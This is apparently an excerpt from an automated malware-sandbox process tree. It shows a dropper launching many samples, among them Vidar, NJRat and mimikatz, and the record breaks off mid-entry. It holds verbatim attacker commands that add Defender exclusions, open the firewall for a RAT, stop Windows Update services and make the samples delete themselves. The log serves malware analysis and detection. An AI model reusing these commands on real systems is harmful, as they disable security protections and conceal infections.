- C:\Users\Admin\Desktop\Files\RuntimeBrikon.exe
  "C:\Users\Admin\Desktop\Files\RuntimeBrikon.exe"
  2⤵
  PID:8636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Desktop\Files\RuntimeBrikon.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
    3⤵
    PID:8860
  - - C:\Windows\system32\certutil.exe
      certutil -hashfile "C:\Users\Admin\Desktop\Files\RuntimeBrikon.exe" MD5
      4⤵
      PID:1236
  - - C:\Windows\system32\find.exe
      find /i /v "md5"
      4⤵
      PID:4604
  - - C:\Windows\system32\find.exe
      find /i /v "certutil"
      4⤵
      PID:6592
- C:\Users\Admin\Desktop\Files\pp.exe
  "C:\Users\Admin\Desktop\Files\pp.exe"
  2⤵
  PID:1344
- C:\Users\Admin\Desktop\Files\stail.exe
  "C:\Users\Admin\Desktop\Files\stail.exe"
  2⤵
  PID:10052
- - C:\Users\Admin\AppData\Local\Temp\is-MFR28.tmp\stail.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-MFR28.tmp\stail.tmp" /SL5="$905EA,5977381,56832,C:\Users\Admin\Desktop\Files\stail.exe"
    3⤵
    PID:6328
  - - C:\Windows\SysWOW64\net.exe
      "C:\Windows\system32\net.exe" pause hd_video_converter_fox_125
      4⤵
      PID:9748
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause hd_video_converter_fox_125
        5⤵
        
        PID:9900
  - - C:\Users\Admin\AppData\Local\HD Video Converter Fox 1.2.5\hdvideoconverterfox125.exe
      "C:\Users\Admin\AppData\Local\HD Video Converter Fox 1.2.5\hdvideoconverterfox125.exe" -i
      4⤵
      PID:2896
- C:\Users\Admin\Desktop\Files\Identifications.exe
  "C:\Users\Admin\Desktop\Files\Identifications.exe"
  2⤵
  PID:9808
- C:\Users\Admin\Desktop\Files\t1.exe
  "C:\Users\Admin\Desktop\Files\t1.exe"
  2⤵
  PID:2428
- C:\Users\Admin\Desktop\Files\ConsoleApp2.exe
  "C:\Users\Admin\Desktop\Files\ConsoleApp2.exe"
  2⤵
  PID:10140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb4e6acc40,0x7ffb4e6acc4c,0x7ffb4e6acc58
  2⤵
  PID:4320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1792,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1788 /prefetch:2
  2⤵
  PID:2860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2044,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2116 /prefetch:3
  2⤵
  PID:3164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2192,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2208 /prefetch:8
  2⤵
  PID:2420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3084,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:4560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:2160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3624,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4392 /prefetch:1
  2⤵
  PID:4772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4756,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4764 /prefetch:8
  2⤵
  PID:1256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4824,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4844 /prefetch:8
  2⤵
  PID:532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4796,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4768 /prefetch:8
  2⤵
  PID:452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4572,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8
  2⤵
  PID:1876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5184 /prefetch:8
  2⤵
  PID:4864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5172,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4772 /prefetch:8
  2⤵
  PID:3392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5168,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5176 /prefetch:2
  2⤵
  PID:1964
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  - Drops file in Windows directory
  PID:1396
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff684774698,0x7ff6847746a4,0x7ff6847746b0
    3⤵
    - Drops file in Windows directory
    PID:4180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4564,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4364 /prefetch:1
  2⤵
  PID:2752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4864,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3384 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:3964
- - C:\Users\Admin\Desktop\4363463463464363463463463.exe
    "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1572
  - - C:\Users\Admin\Desktop\Files\CompleteStudio.exe
      "C:\Users\Admin\Desktop\Files\CompleteStudio.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      PID:800
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:2808
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4192
  - - C:\Users\Admin\Desktop\Files\Vidar.exe
      "C:\Users\Admin\Desktop\Files\Vidar.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4204
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4024
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious use of SetWindowsHookEx
        
        PID:4636
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe" & rd /s /q "C:\ProgramData\ECAKKKKJDBKK" & exit
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3712
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1852
  - - C:\Users\Admin\Desktop\Files\NJRat.exe
      "C:\Users\Admin\Desktop\Files\NJRat.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1164
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\NJRat.exe" "NJRat.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1648
  - - C:\Users\Admin\Desktop\Files\mimikatz.exe
      "C:\Users\Admin\Desktop\Files\mimikatz.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2588
  - - C:\Users\Admin\Desktop\Files\11.exe
      "C:\Users\Admin\Desktop\Files\11.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:3440
    - - C:\Windows\sysarddrvs.exe
        
        C:\Windows\sysarddrvs.exe
        5⤵
        Modifies security service
        Windows security bypass
        Executes dropped EXE
        Windows security modification
        System Location Discovery: System Language Discovery
        
        PID:4884
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:3336
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2784
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:416
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3400
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3088
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1104
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4648
      - C:\Users\Admin\AppData\Local\Temp\731317116.exe
        
        C:\Users\Admin\AppData\Local\Temp\731317116.exe
        6⤵
        
        PID:5972
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:2000
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:4156
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:4348
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:5040
      - C:\Users\Admin\AppData\Local\Temp\581110371.exe
        
        C:\Users\Admin\AppData\Local\Temp\581110371.exe
        6⤵
        
        PID:6600
      - C:\Users\Admin\AppData\Local\Temp\16963676.exe
        
        C:\Users\Admin\AppData\Local\Temp\16963676.exe
        6⤵
        
        PID:6180
        
        C:\Users\Admin\AppData\Local\Temp\1885429921.exe
        
        C:\Users\Admin\AppData\Local\Temp\1885429921.exe
        7⤵
        
        PID:4256
      - C:\Users\Admin\AppData\Local\Temp\1905627913.exe
        
        C:\Users\Admin\AppData\Local\Temp\1905627913.exe
        6⤵
        
        PID:4732
  - - C:\Users\Admin\Desktop\Files\frap.exe
      "C:\Users\Admin\Desktop\Files\frap.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4844
  - - C:\Users\Admin\Desktop\Files\build2.exe
      "C:\Users\Admin\Desktop\Files\build2.exe"
      4⤵
      Executes dropped EXE
      PID:276
  - - C:\Users\Admin\Desktop\Files\pei.exe
      "C:\Users\Admin\Desktop\Files\pei.exe"
      4⤵
      PID:6284
    - - C:\Users\Admin\AppData\Local\Temp\193419708.exe
        
        C:\Users\Admin\AppData\Local\Temp\193419708.exe
        5⤵
        
        PID:6304
      - C:\Windows\sysnldcvmr.exe
        
        C:\Windows\sysnldcvmr.exe
        6⤵
        
        PID:7080
        
        C:\Users\Admin\AppData\Local\Temp\2625712860.exe
        
        C:\Users\Admin\AppData\Local\Temp\2625712860.exe
        7⤵
        
        PID:9348
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:9424
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        9⤵
        
        PID:9580
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:9484
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        9⤵
        
        PID:9572
        
        C:\Users\Admin\AppData\Local\Temp\269933617.exe
        
        C:\Users\Admin\AppData\Local\Temp\269933617.exe
        7⤵
        
        PID:9780
        
        C:\Users\Admin\AppData\Local\Temp\1691726731.exe
        
        C:\Users\Admin\AppData\Local\Temp\1691726731.exe
        7⤵
        
        PID:9924
        
        C:\Users\Admin\AppData\Local\Temp\1236217178.exe
        
        C:\Users\Admin\AppData\Local\Temp\1236217178.exe
        7⤵
        
        PID:7708
  - - C:\Users\Admin\Desktop\Files\FreeYoutubeDownloader.exe
      "C:\Users\Admin\Desktop\Files\FreeYoutubeDownloader.exe"
      4⤵
      PID:7120
    - - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
        
        "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
        5⤵
        
        PID:2104
      - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
        
        "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"
        6⤵
        
        PID:2212
      - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
        
        "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"
        6⤵
        
        PID:5956
      - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
        
        "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"
        6⤵
        
        PID:8732
  - - C:\Users\Admin\Desktop\Files\crss.exe
      "C:\Users\Admin\Desktop\Files\crss.exe"
      4⤵
      PID:1684
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6652
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6848
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7088
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5512
  - - C:\Users\Admin\Desktop\Files\8.11.9-Windows.exe
      "C:\Users\Admin\Desktop\Files\8.11.9-Windows.exe"
      4⤵
      PID:6620
  - - C:\Users\Admin\Desktop\Files\4ck3rr.exe
      "C:\Users\Admin\Desktop\Files\4ck3rr.exe"
      4⤵
      PID:6824
  - - C:\Users\Admin\Desktop\Files\postbox.exe
      "C:\Users\Admin\Desktop\Files\postbox.exe"
      4⤵
      PID:7476
    - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        5⤵
        
        PID:2628
  - - C:\Users\Admin\Desktop\Files\LgendPremium.exe
      "C:\Users\Admin\Desktop\Files\LgendPremium.exe"
      4⤵
      PID:2000
  - - C:\Users\Admin\Desktop\Files\pi.exe
      "C:\Users\Admin\Desktop\Files\pi.exe"
      4⤵
      PID:6796
  - - C:\Users\Admin\Desktop\Files\bildnewl.exe
      "C:\Users\Admin\Desktop\Files\bildnewl.exe"
      4⤵
      PID:7700
  - - C:\Users\Admin\Desktop\Files\msf443.exe
      "C:\Users\Admin\Desktop\Files\msf443.exe"
      4⤵
      PID:8692
  - - C:\Users\Admin\Desktop\Files\npp.exe
      "C:\Users\Admin\Desktop\Files\npp.exe"
      4⤵
      PID:7688
    - - C:\Users\Admin\AppData\Local\Temp\333876381.exe
        
        C:\Users\Admin\AppData\Local\Temp\333876381.exe
        5⤵
        
        PID:9256
  - - C:\Users\Admin\Desktop\Files\oclo.exe
      "C:\Users\Admin\Desktop\Files\oclo.exe"
      4⤵
      PID:8668
  - - C:\Users\Admin\Desktop\Files\UNICO-Venta3401005.exe
      "C:\Users\Admin\Desktop\Files\UNICO-Venta3401005.exe"
      4⤵
      PID:7116
    - - C:\Archivos de programa\UNICO - Ventas\ODBC_VEN.exe
        
        "C:\Archivos de programa\UNICO - Ventas\ODBC_VEN.exe"
        5⤵
        
        PID:9072
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Archivos de programa\UNICO - Ventas\ODBC.cmd" "
        5⤵
        
        PID:380
  - - C:\Users\Admin\Desktop\Files\300.exe
      "C:\Users\Admin\Desktop\Files\300.exe"
      4⤵
      PID:10124
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:10032
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10032 -s 1360
        6⤵
        Program crash
        
        PID:1300
  - - C:\Users\Admin\Desktop\Files\Utility2.exe
      "C:\Users\Admin\Desktop\Files\Utility2.exe"
      4⤵
      PID:7540
  - - C:\Users\Admin\Desktop\Files\PURLOG.exe
      "C:\Users\Admin\Desktop\Files\PURLOG.exe"
      4⤵
      PID:7328
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\Desktop\Files\PURLOG.exe' -Force
        5⤵
        
        PID:10196
  - - C:\Users\Admin\Desktop\Files\whiteheroin.exe
      "C:\Users\Admin\Desktop\Files\whiteheroin.exe"
      4⤵
      PID:6500
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:5240
  - - C:\Users\Admin\Desktop\Files\ldqj18tn.exe
      "C:\Users\Admin\Desktop\Files\ldqj18tn.exe"
      4⤵
      PID:436
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
        5⤵
        
        PID:9020
  - - C:\Users\Admin\Desktop\Files\si.exe
      "C:\Users\Admin\Desktop\Files\si.exe"
      4⤵
      PID:2976
  - - C:\Users\Admin\Desktop\Files\splwow64_1.exe
      "C:\Users\Admin\Desktop\Files\splwow64_1.exe"
      4⤵
      PID:6776
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
        5⤵
        
        PID:7516
  - - C:\Users\Admin\Desktop\Files\LoadNew.exe
      "C:\Users\Admin\Desktop\Files\LoadNew.exe"
      4⤵
      PID:5844
  - - C:\Users\Admin\Desktop\Files\Reaper%20cfx%20Spoofer%20V2.exe
      "C:\Users\Admin\Desktop\Files\Reaper%20cfx%20Spoofer%20V2.exe"
      4⤵
      PID:2000
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cfx.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cfx.exe
        5⤵
        
        PID:8096
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        6⤵
        
        PID:8996
  - - C:\Users\Admin\Desktop\Files\bp.exe
      "C:\Users\Admin\Desktop\Files\bp.exe"
      4⤵
      PID:664
  - - C:\Users\Admin\Desktop\Files\wow.exe
      "C:\Users\Admin\Desktop\Files\wow.exe"
      4⤵
      PID:7424
  - - C:\Users\Admin\Desktop\Files\s.exe
      "C:\Users\Admin\Desktop\Files\s.exe"
      4⤵
      PID:1996
    - - C:\Windows\sysvplervcs.exe
        
        C:\Windows\sysvplervcs.exe
        5⤵
        
        PID:8556
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        
        PID:3708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8576
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        6⤵
        
        PID:3676
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:4628
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:5608
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:6740
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        7⤵
        Launches sc.exe
        
        PID:6472
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        7⤵
        Launches sc.exe
        
        PID:2132
  - - C:\Users\Admin\Desktop\Files\clsid.exe
      "C:\Users\Admin\Desktop\Files\clsid.exe"
      4⤵
      PID:5960
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:8544
  - - C:\Users\Admin\Desktop\Files\Macro2.exe
      "C:\Users\Admin\Desktop\Files\Macro2.exe"
      4⤵
      PID:6848
  - - C:\Users\Admin\Desktop\Files\r.exe
      "C:\Users\Admin\Desktop\Files\r.exe"
      4⤵
      PID:2628
  - - C:\Users\Admin\Desktop\Files\12.exe
      "C:\Users\Admin\Desktop\Files\12.exe"
      4⤵
      PID:9536
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Desktop\Files\12.exe" & del "C:\ProgramData\*.dll"" & exit
        5⤵
        
        PID:6372
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        6⤵
        Delays execution with timeout.exe
        
        PID:9528
    - - C:\Windows\SysWOW64\WerFault.exe
        
